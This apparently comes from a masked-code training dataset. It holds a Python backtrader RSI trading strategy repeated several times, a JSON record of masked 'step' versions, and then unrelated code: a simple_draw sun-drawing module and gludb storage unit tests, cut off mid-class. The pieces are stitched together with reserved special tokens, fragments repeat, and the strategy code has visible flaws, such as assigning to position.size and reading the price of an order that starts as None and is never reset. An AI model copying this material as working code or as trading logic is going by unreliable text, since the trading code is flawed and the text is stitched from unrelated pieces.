class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
import backtrader as bt
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
import backtrader as bt
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log(
'BUY Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log(
'SELL Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
# The condition for activating BUY function --> By checking oversold condition.
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
# If BUY is activated and below conditions are met, then aa buy order would be placed.
if self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and self.buyAlert:
size = round((self.broker.getcash() / self.data), 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
# print(self.datas[0].low[0])
if self.position.size != 0:
# The condition for activating SELL_1 function --> Waiting for RSI to reach overbought zone.
if self.rsi_4 > 67:
self.sellAlert1 = True
# If SELL_1 is activated and below conditions are met, then a sell order would be placed.
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
# The condition for activating SELL_2 function --> Activated at overbought condition with RSI>85
if self.rsi_4 > 85:
self.sellAlert2 = True
# If SELL_2 is activated and below conditions are met, then a sell order would be placed.
if (self.rsi_4 < 80) and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
# Setting Stop Loss for wrongly opened position.
if 0.82 * self.order.executed.price > self.datas[0].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
|
flexible
|
{
"blob_id": "9119fc1c75de980bbcf74f1e06a36ba587fc490b",
"index": 102,
"step-1": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n <mask token>\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n <mask token>\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\n",
"step-3": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\n",
"step-4": "import backtrader as bt\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\n",
"step-5": "import backtrader as bt\r\n\r\n\r\nclass RSIStrategy(bt.Strategy):\r\n\r\n def __init__(self):\r\n self.order = None\r\n self.position.size = 0\r\n self.sellAlert1 = False\r\n self.sellAlert2 = False\r\n self.buyAlert = False\r\n self.failureNum = 0\r\n self.successNum = 0\r\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\r\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\r\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\r\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\r\n\r\n def log(self, txt, dt=None):\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n return self.log(\r\n 'BUY Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))\r\n\r\n elif order.issell():\r\n print('Succeeded for {} times.'.format(self.successNum))\r\n return self.log(\r\n 'SELL Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))\r\n\r\n def next(self):\r\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\r\n if self.position.size == 0:\r\n # The condition for activating BUY function --> By checking oversold condition.\r\n if self.rsi_2 < 30 and self.rsi_3 < 40:\r\n self.buyAlert = True\r\n # If BUY is activated and below conditions are met, then aa buy order would be placed.\r\n if self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and self.buyAlert:\r\n size = round((self.broker.getcash() / self.data), 3)\r\n self.order = self.buy(size=size)\r\n self.buyAlert = False\r\n print(round(self.broker.get_cash(), 1))\r\n # print(self.datas[0].low[0])\r\n\r\n if self.position.size != 0:\r\n # The condition for activating SELL_1 function --> Waiting for RSI to reach overbought zone.\r\n if self.rsi_4 > 67:\r\n self.sellAlert1 = True\r\n # If SELL_1 is activated and below conditions are met, then a sell order would be placed.\r\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\r\n self.close()\r\n self.successNum += 1\r\n self.sellAlert1 = False\r\n\r\n # The condition for activating SELL_2 function --> Activated at overbought condition with RSI>85\r\n if self.rsi_4 > 85:\r\n self.sellAlert2 = True\r\n # If SELL_2 is activated and below conditions are met, then a sell order would be placed.\r\n if (self.rsi_4 < 80) and self.sellAlert2:\r\n self.close()\r\n self.successNum += 1\r\n self.sellAlert1 = False\r\n self.sellAlert2 = False\r\n\r\n # Setting Stop Loss for wrongly opened position.\r\n if 0.82 * self.order.executed.price > self.datas[0].close > 0.8 * self.order.executed.price:\r\n self.close()\r\n self.failureNum += 1\r\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import simple_draw as sd
import random
# sd.resolution = (1400, 900)
# Prepare data for the sun function
def sun_prepare(xpoint, ypoint, radius, color, angle):
delta_list = []
radius_list = []
for delta in range(0, 360, angle):
delta_list.append(delta)
radius_list.append(random.randint(radius - 10, radius + 10))
return xpoint, ypoint, color, radius, delta_list, radius_list
# Drawing the sun
def sun(prepare_list):
xpoint = prepare_list[0]
ypoint = prepare_list[1]
color = prepare_list[2]
radius = prepare_list[3]
delta_list = prepare_list[4]
radius_list = prepare_list[5]
sd.start_drawing()
point = sd.get_point(xpoint, ypoint)
sd.circle(center_position=point, radius=radius * 3.9, color=sd.background_color, width=0)
sd.circle(center_position=point, radius=radius, color=color, width=0)
for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):
v = sd.get_vector(start_point=point, angle=delta, width=6,
length=random.randint(radius * 2, radius * 3))
v.draw(color)
sd.finish_drawing()
# sd.pause()
|
normal
|
{
"blob_id": "46babde9c26a944c9d29121b6bbf89a32f242a81",
"index": 251,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.\n background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6, length=\n random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n",
"step-4": "import simple_draw as sd\nimport random\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.\n background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6, length=\n random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n",
"step-5": "import simple_draw as sd\nimport random\n\n\n# sd.resolution = (1400, 900)\n\n# Prepare data for the sun function\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\n# Drawing the sun\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6,\n length=random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n\n# sd.pause()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
<|reserved_special_token_0|>
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None)
def tearDown(self):
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None)
def tearDown(self):
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
